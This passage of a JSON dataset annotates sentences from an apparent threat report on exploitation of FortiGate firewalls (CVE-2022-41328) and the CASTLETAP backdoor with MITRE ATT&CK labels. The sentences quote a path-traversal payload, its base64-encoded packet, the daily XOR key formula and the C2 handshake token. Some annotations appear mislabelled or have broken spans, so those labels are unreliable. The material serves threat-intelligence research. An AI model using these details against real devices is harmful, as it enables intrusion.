"mitre-80_mitre_report-p1-s41-4b848b", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 41, "context_before": "/bin/lspci execute wireless-controller hs20-icon upload-icon tftp ../..", "sentence_text": "/../../../../bin/lspci Fortinet confirmed the exploitation of this command was not seen prior to these events and assigned the designation CVE-2022-41328.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" }, { "id": "T1574.006", "name": "Dynamic Linker Hijacking" } ], "procedure": "Exploited command to target /bin/lspci via TFTP", "entities": [ { "text": "/../../../../bin/lspci", "start": 0, "end": 22, "label": "Infrastructure_Indicator" }, { "text": "", "start": 23, "end": 39, "label": "Infrastructure_Indicator" }, { "text": " CVE-2022-41328", "start": 155, "end": 170, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-80_mitre_report-p1-s42-724d01", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 42, "context_before": "/../../../../bin/lspci Fortinet confirmed the exploitation of this command was not seen prior to these events and assigned the designation CVE-2022-41328.", "sentence_text": "Fortinet successfully replicated the exploit using the syntax seen in the failed command events.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s43-f1a24e", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 43, "context_before": "Fortinet successfully replicated the exploit using the syntax seen in the failed command events.", "sentence_text": "Further supporting evidence of attempted exploitation was found in FortiGuard logs events with “ file_transfer: TFTP.Server.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Attempted exploitation via TFTP file transfer", "entities": [ { "text": " FortiGuard logs ", "start": 66, "end": 83, "label": "Infrastructure_Indicator" }, { "text": "TFTP.Server", "start": 112, "end": 123, "label": "Infrastructure_Indicator" }, { "text": " attempted exploitation", "start": 30, "end": 53, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s45-f8b542", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 45, "context_before": "Buffer.", "sentence_text": "Overflow repeated X times ” in the msg field.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s46-edbf4a", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 46, "context_before": "Overflow repeated X times ” in the msg field.", "sentence_text": "PFBBVFRFUk5TPiAAATsuLi88L1BBVFRFUk5TPgo8VVJJPiA8L1VSST4KPEhFQURFUj4gPC9IRUFERVI+CjxCT\n0RZPiA8L0JPRFk+CjxQQUNLRVQ+IAABLi4vLi4vLi4vLi4vLi4vLi4vYmluL2xzcGNpAG9jdGV0ADwvUEFDS0\nVUPg==\nBase 64 Decoded ..../../../../../../bin/lspci.octet. Symlink to Suspected Backdoor (/bin/lspci -> /bin/sysctl)\n/bin/lspci\nbased on the failed commands seen within FortiGate logs.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.003", "name": "Rename Legitimate Utilities" }, { "id": "T1546.005", "name": "Trap" } ], "procedure": "Created a symlink from /bin/lspci to /bin/sysctl as a suspected backdoor", "entities": [ { "text": "Base 64 Decoded", "start": 179, "end": 194, "label": "Infrastructure_Indicator" }, { "text": "/bin/lspci ", "start": 281, "end": 292, "label": "Infrastructure_Indicator" }, { "text": " /bin/sysct", "start": 294, "end": 305, "label": "Infrastructure_Indicator" }, { "text": "/bin/lspci", "start": 223, "end": 233, "label": "Infrastructure_Indicator" }, { "text": "/bin/lspci", "start": 308, "end": 318, "label": "Infrastructure_Indicator" }, { "text": "FortiGate logs", "start": 360, "end": 374, "label": "Infrastructure_Indicator" }, { "text": "Symlink ", "start": 250, "end": 258, "label": "Infrastructure_Indicator" }, { "text": " Symlink to Suspected Backdoor", "start": 249, "end": 279, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s47-399dec", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 47, "context_before": "PFBBVFRFUk5TPiAAATsuLi88L1BBVFRFUk5TPgo8VVJJPiA8L1VSST4KPEhFQURFUj4gPC9IRUFERVI+CjxCT\n0RZPiA8L0JPRFk+CjxQQUNLRVQ+IAABLi4vLi4vLi4vLi4vLi4vLi4vYmluL2xzcGNpAG9jdGV0ADwvUEFDS0\nVUPg==\nBase 64 Decoded ..../../../../../../bin/lspci.octet. Symlink to Suspected Backdoor (/bin/lspci -> /bin/sysctl)\n/bin/lspci\nbased on the failed commands seen within FortiGate logs.", "sentence_text": "In total, two variants of /bin/lspci were identified; a standalone version of the binary and a version which was symlinked to /bin/sysctl .", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.003", "name": "Rename Legitimate Utilities" }, { "id": "T1546.005", "name": "Trap" } ], "procedure": "Created two variants of /bin/lspci including a symlink to /bin/sysctl", "entities": [ { "text": "/bin/lspci", "start": 26, "end": 36, "label": "Infrastructure_Indicator" }, { "text": " /bin/sysctl", "start": 125, "end": 137, "label": "Infrastructure_Indicator" }, { "text": "symlink", "start": 113, "end": 120, "label": "Infrastructure_Indicator" }, { "text": "identified", "start": 42, "end": 52, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s48-d0f0e1", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 48, "context_before": "In total, two variants of /bin/lspci were identified; a standalone version of the binary and a version which was symlinked to /bin/sysctl .", "sentence_text": "Fortinet confirmed that /bin/lspci should always be a standalone binary.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s49-b8e97b", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 49, "context_before": "Fortinet confirmed that /bin/lspci should always be a standalone binary.", "sentence_text": "File listing entries for /bin/lspci and /bin/sysctl on the compromised FortiGate firewalls contained similar timestamps that did not align with other legitimate binaries on the FortiGate machines.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.006", "name": "Timestomp" } ], "procedure": "Modified /bin/lspci and /bin/sysctl with anomalous timestamps", "entities": [ { "text": "/bin/lspci", "start": 25, "end": 35, "label": "Infrastructure_Indicator" }, { "text": "/bin/sysctl ", "start": 40, "end": 52, "label": "Infrastructure_Indicator" }, { "text": "FortiGate firewalls", "start": 71, "end": 90, "label": "Infrastructure_Indicator" }, { "text": "FortiGate machines", "start": 177, "end": 195, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-80_mitre_report-p1-s50-5b286d", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 50, "context_before": "File listing entries for /bin/lspci and /bin/sysctl on the compromised FortiGate firewalls contained similar timestamps that did not align with other legitimate binaries on the FortiGate machines.", "sentence_text": "Additionally, the file size for /bin/sysctl on the compromised FortiGate firewall was much larger than reported on non-compromised devices.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Modified /bin/sysctl file size on compromised devices", "entities": [ { "text": " compromised FortiGate firewall", "start": 50, "end": 81, "label": "Infrastructure_Indicator" }, { "text": "non-compromised devices", "start": 115, "end": 138, "label": "Infrastructure_Indicator" }, { "text": " /bin/sysctl ", "start": 31, "end": 44, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-80_mitre_report-p1-s51-369325", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 51, "context_before": "Additionally, the file size for /bin/sysctl on the compromised FortiGate firewall was much larger than reported on non-compromised devices.", "sentence_text": "The file listing snippets in Figure 10 and Figure 11 highlight the differences across the original and modified versions of /bin/lspci and /bin/sysctl present on the FortiGate firewalls.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Modified versions of /bin/lspci and /bin/sysctl on FortiGate firewalls", "entities": [ { "text": "/bin/lspci ", "start": 124, "end": 135, "label": "Infrastructure_Indicator" }, { "text": " /bin/sysctl ", "start": 138, "end": 151, "label": "Infrastructure_Indicator" }, { "text": "FortiGate firewalls", "start": 166, "end": 185, "label": "Infrastructure_Indicator" }, { "text": "modified ", "start": 103, "end": 112, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s52-4a484a", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 52, "context_before": "The file listing snippets in Figure 10 and Figure 11 highlight the differences across the original and modified versions of /bin/lspci and /bin/sysctl present on the FortiGate firewalls.", "sentence_text": "COMPROMISED-FGT101F # fnsysctl ls -la", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s53-1a59b4", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 53, "context_before": "COMPROMISED-FGT101F # fnsysctl ls -la", "sentence_text": "Oct 19 05:11 lspci -> /bin/sysctl lrwxrwxrwx 1 root root 9 Oct 18 13:09 lted -> /bin/init lrwxrwxrwx 1 root root 9 Oct 18 13:09 memuploadd -> /bin/init -rwxr-xr-x 1 root root 1478216 Oct 19 05:11 sysctl NON-COMPROMISED-FGT101F # fnsysctl ls -la", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.003", "name": "Rename Legitimate Utilities" }, { "id": "T1546.005", "name": "Trap" } ], "procedure": "Established symlinks (lspci, lted, memuploadd) to malicious binaries for persistence", "entities": [ { "text": " lspci -> /bin/sysct", "start": 12, "end": 32, "label": "Infrastructure_Indicator" }, { "text": "memuploadd -> /bin/init ", "start": 128, "end": 152, "label": "Infrastructure_Indicator" }, { "text": "lted -> /bin/init", "start": 72, "end": 89, "label": "Infrastructure_Indicator" }, { "text": "NON-COMPROMISED-FGT101F", "start": 203, "end": 226, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-80_mitre_report-p1-s54-f68354", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 54, "context_before": "Oct 19 05:11 lspci -> /bin/sysctl lrwxrwxrwx 1 root root 9 Oct 18 13:09 lted -> /bin/init lrwxrwxrwx 1 root root 9 Oct 18 13:09 memuploadd -> /bin/init -rwxr-xr-x 1 root root 1478216 Oct 19 05:11 sysctl NON-COMPROMISED-FGT101F # fnsysctl ls -la", "sentence_text": "Fri Sep 2 12:07:55 2022 251480 sysctl In addition to the differences in modification time and size, the output of the file listing command fnsysctl ls -l /bin displayed multiple fields in different formats and order.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s55-379075", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 55, "context_before": "Fri Sep 2 12:07:55 2022 251480 sysctl In addition to the differences in modification time and size, the output of the file listing command fnsysctl ls -l /bin displayed multiple fields in different formats and order.", "sentence_text": "This is likely due to the threat actor replacing /bin/sysctl and therefore changing the shell functionality on the FortiGate firewall.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.003", "name": "Rename Legitimate Utilities" }, { "id": "T1546.005", "name": "Trap" } ], "procedure": "Replaced /bin/sysctl to change shell functionality", "entities": [ { "text": "replacing ", "start": 39, "end": 49, "label": "Action" }, { "text": "/bin/sysctl", "start": 49, "end": 60, "label": "Infrastructure_Indicator" }, { "text": "FortiGate firewall", "start": 115, "end": 133, "label": "Infrastructure_Indicator" }, { "text": "threat actor", "start": 26, "end": 38, "label": "ThreatActor" } ] }, { "uid": "mitre-80_mitre_report-p1-s56-488816", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 56, "context_before": "This is likely due to the threat actor replacing /bin/sysctl and therefore changing the shell functionality on the FortiGate firewall.", "sentence_text": "Changes made to the FortiOS file system are not persistent, so the files were unable to be recovered for analysis.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s57-b01c3c", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 57, "context_before": "Changes made to the FortiOS file system are not persistent, so the files were unable to be recovered for analysis.", "sentence_text": "By default, Fortinet devices running FortiOS have an archive on disk labelled rootfs.gz within the /data/ partition.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s58-46c528", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 58, "context_before": "By default, Fortinet devices running FortiOS have an archive on disk labelled rootfs.gz within the /data/ partition.", "sentence_text": "Upon boot, this file is mounted as the root filesystem.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s59-1de734", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 59, "context_before": "Upon boot, this file is mounted as the root filesystem.", "sentence_text": "This means if modifications are made to the mounted image, the changes will not be persistent unless they are written to the rootfs.gz archive.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s60-feb2bb", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 60, "context_before": "This means if modifications are made to the mounted image, the changes will not be persistent unless they are written to the rootfs.gz archive.", "sentence_text": "FortiGate firewalls do not support files being exported from the mounted filesystem during runtime.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s61-7c24c0", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 61, "context_before": "FortiGate firewalls do not support files being exported from the mounted filesystem during runtime.", "sentence_text": "Since the modifications made to /bin/lspci and /bin/sysctl were not written to the rootfs.gz archive, they were not installed persistently and could not be further analyzed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s62-102b10", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 62, "context_before": "Since the modifications made to /bin/lspci and /bin/sysctl were not written to the rootfs.gz archive, they were not installed persistently and could not be further analyzed.", "sentence_text": "CASTLETAP (FortiGate Firewall Backdoor)\nAnalysis on the FortiGate firewalls identified an additional malicious file /bin/fgfm .", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" }, { "id": "T1036", "name": "Masquerading" } ], "procedure": "Deployed CASTLETAP backdoor as /bin/fgfm on FortiGate firewalls", "entities": [ { "text": "CASTLETAP", "start": 0, "end": 9, "label": "MalwareTool" }, { "text": " /bin/fgfm", "start": 115, "end": 125, "label": "MalwareTool" }, { "text": "identified ", "start": 76, "end": 87, "label": "Action" }, { "text": "FortiGate firewalls", "start": 56, "end": 75, "label": "Infrastructure_Indicator" }, { "text": "FortiGate Firewall ", "start": 11, "end": 30, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-80_mitre_report-p1-s63-2a05f4", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 63, "context_before": "CASTLETAP (FortiGate Firewall Backdoor)\nAnalysis on the FortiGate firewalls identified an additional malicious file /bin/fgfm .", "sentence_text": "The threat actor likely named the file ‘ fgfm ’ in an attempt to disguise the backdoor as the legitimate service ‘ fgfmd ’ which facilitates communication between the FortiManager and FortiGate firewalls.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.005", "name": "Match Legitimate Resource Name or Location" } ], "procedure": "Disguised the CASTLETAP backdoor as the legitimate fgfmd service", "entities": [ { "text": "threat actor", "start": 4, "end": 16, "label": "ThreatActor" }, { "text": "fgfm ", "start": 41, "end": 46, "label": "MalwareTool" }, { "text": "fgfmd ", "start": 115, "end": 121, "label": "Infrastructure_Indicator" }, { "text": "FortiManager ", "start": 167, "end": 180, "label": "Infrastructure_Indicator" }, { "text": " FortiGate firewalls", "start": 183, "end": 203, "label": "Infrastructure_Indicator" }, { "text": "disguise ", "start": 65, "end": 74, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s64-235974", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 64, "context_before": "The threat actor likely named the file ‘ fgfm ’ in an attempt to disguise the backdoor as the legitimate service ‘ fgfmd ’ which facilitates communication between the FortiManager and FortiGate firewalls.", "sentence_text": "Once executed, CASTLETAP created a raw promiscuous socket to sniff network traffic.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1040", "name": "Network Sniffing" } ], "procedure": "Created a raw promiscuous socket to sniff network traffic", "entities": [ { "text": "CASTLETAP ", "start": 15, "end": 25, "label": "MalwareTool" }, { "text": " raw promiscuous socket", "start": 34, "end": 57, "label": "Infrastructure_Indicator" }, { "text": " network traffic", "start": 66, "end": 82, "label": "Infrastructure_Indicator" }, { "text": "created ", "start": 25, "end": 33, "label": "Action" }, { "text": "sniff ", "start": 61, "end": 67, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s65-09cf78", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 65, "context_before": "Once executed, CASTLETAP created a raw promiscuous socket to sniff network traffic.", "sentence_text": "CASTLETAP then filtered and XOR decoded a 9-byte magic activation string in the payload of an ICMP echo request packet.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1095", "name": "Non-Application Layer Protocol" } ], "procedure": "Filtered and XOR decoded an activation string from ICMP packets", "entities": [ { "text": "CASTLETAP ", "start": 0, "end": 10, "label": "MalwareTool" }, { "text": " ICMP echo request packet", "start": 93, "end": 118, "label": "Infrastructure_Indicator" }, { "text": "9-byte magic activation string ", "start": 42, "end": 73, "label": "Infrastructure_Indicator" }, { "text": "XOR decoded", "start": 28, "end": 39, "label": "Action" }, { "text": "filtered ", "start": 15, "end": 24, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s66-40d931", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 66, "context_before": "CASTLETAP then filtered and XOR decoded a 9-byte magic activation string in the payload of an ICMP echo request packet.", "sentence_text": "To decode the C2 information within the ICMP packet, a single-byte XOR key was derived from the Epoch date stamp to decrypt the payload data.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" }, { "id": "T1095", "name": "Non-Application Layer Protocol" } ], "procedure": "Decoded C2 information in ICMP packets using XOR encryption", "entities": [ { "text": "ICMP packet", "start": 40, "end": 51, "label": "Infrastructure_Indicator" }, { "text": " Epoch date stamp", "start": 95, "end": 112, "label": "Infrastructure_Indicator" }, { "text": "single-byte XOR key", "start": 55, "end": 74, "label": "Infrastructure_Indicator" }, { "text": "decrypt ", "start": 116, "end": 124, "label": "Action" }, { "text": "decode ", "start": 3, "end": 10, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s67-64ecf2", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 67, "context_before": "To decode the C2 information within the ICMP packet, a single-byte XOR key was derived from the Epoch date stamp to decrypt the payload data.", "sentence_text": "This meant the encoding standard changed every day.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "Changed the encoding standard daily", "entities": [ { "text": "encoding standard ", "start": 15, "end": 33, "label": "Infrastructure_Indicator" }, { "text": "changed ", "start": 33, "end": 41, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s68-2124e8", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 68, "context_before": "This meant the encoding standard changed every day.", "sentence_text": "((year + 1900 + month * (year + 1900))", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s69-056577", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 69, "context_before": "((year + 1900 + month * (year + 1900))", "sentence_text": "* date) % 255 year: index starting from 1900 i.e. current_year-1900 month: index starting from 0 date: index starting from 1 When the C2 IP address and port was parsed from the activation packet, CASTLETAP initiated a connection to the C2 over an SSL socket.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Initiated an SSL connection to the C2 server after parsing IP and port", "entities": [ { "text": "CASTLETAP", "start": 196, "end": 205, "label": "MalwareTool" }, { "text": " C2 IP address ", "start": 133, "end": 148, "label": "Infrastructure_Indicator" }, { "text": "port ", "start": 152, "end": 157, "label": "Infrastructure_Indicator" }, { "text": "SSL socket", "start": 247, "end": 257, "label": "Infrastructure_Indicator" }, { "text": "initiated ", "start": 206, "end": 216, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s70-0e0665", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 70, "context_before": "* date) % 255 year: index starting from 1900 i.e. current_year-1900 month: index starting from 0 date: index starting from 1 When the C2 IP address and port was parsed from the activation packet, CASTLETAP initiated a connection to the C2 over an SSL socket.", "sentence_text": "Once this connection was established, CASTLETAP expected the C2 server to initiate a handshake with the 16-byte sequence seen in Figure 13, echoing the same sequence in response.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "Performed a handshake with the C2 server using a 16-byte sequence", "entities": [ { "text": "CASTLETAP ", "start": 38, "end": 48, "label": "MalwareTool" }, { "text": " C2 server", "start": 60, "end": 70, "label": "Infrastructure_Indicator" }, { "text": "16-byte sequence ", "start": 104, "end": 121, "label": "Infrastructure_Indicator" }, { "text": "handshake ", "start": 85, "end": 95, "label": "Action" }, { "text": "initiate ", "start": 74, "end": 83, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s71-706738", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 71, "context_before": "Once this connection was established, CASTLETAP expected the C2 server to initiate a handshake with the 16-byte sequence seen in Figure 13, echoing the same sequence in response.", "sentence_text": "Once connected to the C2, CASTLETAP could accept multiple types of commands over SSL, as seen in Table 4.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Accepted multiple command types from C2 over SSL connection", "entities": [ { "text": "CASTLETAP ", "start": 26, "end": 36, "label": "MalwareTool" }, { "text": "C2", "start": 22, "end": 24, "label": "Infrastructure_Indicator" }, { "text": "SSL", "start": 81, "end": 84, "label": "Infrastructure_Indicator" }, { "text": "accept ", "start": 42, "end": 49, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s72-9d0e47", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 72, "context_before": "Once connected to the C2, CASTLETAP could accept multiple types of commands over SSL, as seen in Table 4.", "sentence_text": "When a command was successfully received, the backdoor returned the sequence ‘;7(Zu9YTsA7qQ#vw’ as an acknowledgement token; this same string was also sent to signal session termination.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "Used a specific acknowledgement token for commands and session termination", "entities": [ { "text": "acknowledgement token", "start": 102, "end": 123, "label": "Infrastructure_Indicator" }, { "text": "‘;7(Zu9YTsA7qQ#vw’", "start": 77, "end": 95, "label": "Infrastructure_Indicator" }, { "text": "returned ", "start": 55, "end": 64, "label": "Action" }, { "text": "sent ", "start": 151, "end": 156, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s73-47d832", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 73, "context_before": "When a command was successfully received, the backdoor returned the sequence ‘;7(Zu9YTsA7qQ#vw’ as an acknowledgement token; this same string was also sent to signal session termination.", "sentence_text": "Once CASTLETAP was deployed to the FortiGate firewalls, the threat actor connected to ESXi and vCenter machines.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" } ], "procedure": "After deploying the CASTLETAP backdoor, the threat actor connected to ESXi and vCenter machines to move laterally within the environment.", "entities": [ { "text": "CASTLETAP", "start": 5, "end": 14, "label": "MalwareTool" }, { "text": "connected to ESXi and vCenter machines", "start": 73, "end": 111, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s74-d5f494", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 74, "context_before": "Once CASTLETAP was deployed to the FortiGate firewalls, the threat actor connected to ESXi and vCenter machines.", "sentence_text": "The threat actor deployed VIRTUALPITA and VIRTUALPIE to establish persistence, allowing for continued access to the hypervisors and the guest machines.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Deployed VIRTUALPITA and VIRTUALPIE to establish persistence on hypervisors", "entities": [ { "text": " threat actor", "start": 3, "end": 16, "label": "ThreatActor" }, { "text": "deployed ", "start": 17, "end": 26, "label": "Action" }, { "text": "VIRTUALPITA ", "start": 26, "end": 38, "label": "MalwareTool" }, { "text": "VIRTUALPIE ", "start": 42, "end": 53, "label": "MalwareTool" }, { "text": "hypervisors ", "start": 116, "end": 128, "label": "Infrastructure_Indicator" }, { "text": " guest machines", "start": 135, "end": 150, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-80_mitre_report-p1-s75-bdbf48", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 75, "context_before": "The threat actor deployed VIRTUALPITA and VIRTUALPIE to establish persistence, allowing for continued access to the hypervisors and the guest machines.", "sentence_text": "This is described in further detail in the blog post, “ Bad VIB(E)s", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s76-1a7a99", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 76, "context_before": "This is described in further detail in the blog post, “ Bad VIB(E)s", "sentence_text": "Part One: Investigating Novel Malware Persistence Within ESXi Hypervisors .”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s77-3a589b", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 77, "context_before": "Part One: Investigating Novel Malware Persistence Within ESXi Hypervisors .”", "sentence_text": "Scenario #2 (Detailed): FortiManager Not Exposed to the Internet The technical details that follow describe the attack path taken by the threat actor where the FortiManager had network Access Control Lists (ACL) set up to restrict external access.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s78-510d2b", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 78, "context_before": "Scenario #2 (Detailed): FortiManager Not Exposed to the Internet The technical details that follow describe the attack path taken by the threat actor where the FortiManager had network Access Control Lists (ACL) set up to restrict external access.", "sentence_text": "Regaining Access to the Internet-restricted FortiManager When ACLs were implemented on the FortiManager device, the threat actor lost direct public access to device.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1562", "name": "Impair Defenses" }, { "id": "T1090", "name": "Proxy" } ], "procedure": "Lost direct public access to the FortiManager due to ACL implementation", "entities": [ { "text": " threat actor", "start": 115, "end": 128, "label": "ThreatActor" }, { "text": "FortiManager device", "start": 91, "end": 110, "label": "Infrastructure_Indicator" }, { "text": "ACLs ", "start": 62, "end": 67, "label": "Infrastructure_Indicator" }, { "text": "lost direct public access", "start": 129, "end": 154, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s79-30de62", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 79, "context_before": "Regaining Access to the Internet-restricted FortiManager When ACLs were implemented on the FortiManager device, the threat actor lost direct public access to device.", "sentence_text": "To regain access to the FortiManager, the threat actor pivoted from a FortiGate Firewall compromised with CASTLETAP.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" } ], "procedure": "Pivoted from a compromised FortiGate firewall to regain access to the FortiManager", "entities": [ { "text": "CASTLETAP", "start": 106, "end": 115, "label": "MalwareTool" }, { "text": "FortiManager", "start": 24, "end": 36, "label": "Infrastructure_Indicator" }, { "text": " FortiGate Firewall", "start": 69, "end": 88, "label": "Infrastructure_Indicator" }, { "text": "pivoted ", "start": 55, "end": 63, "label": "Action" }, { "text": " threat actor", "start": 41, "end": 54, "label": "ThreatActor" } ] }, { "uid": "mitre-80_mitre_report-p1-s80-ef0675", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 80, "context_before": "To regain access to the FortiManager, the threat actor pivoted from a FortiGate Firewall compromised with 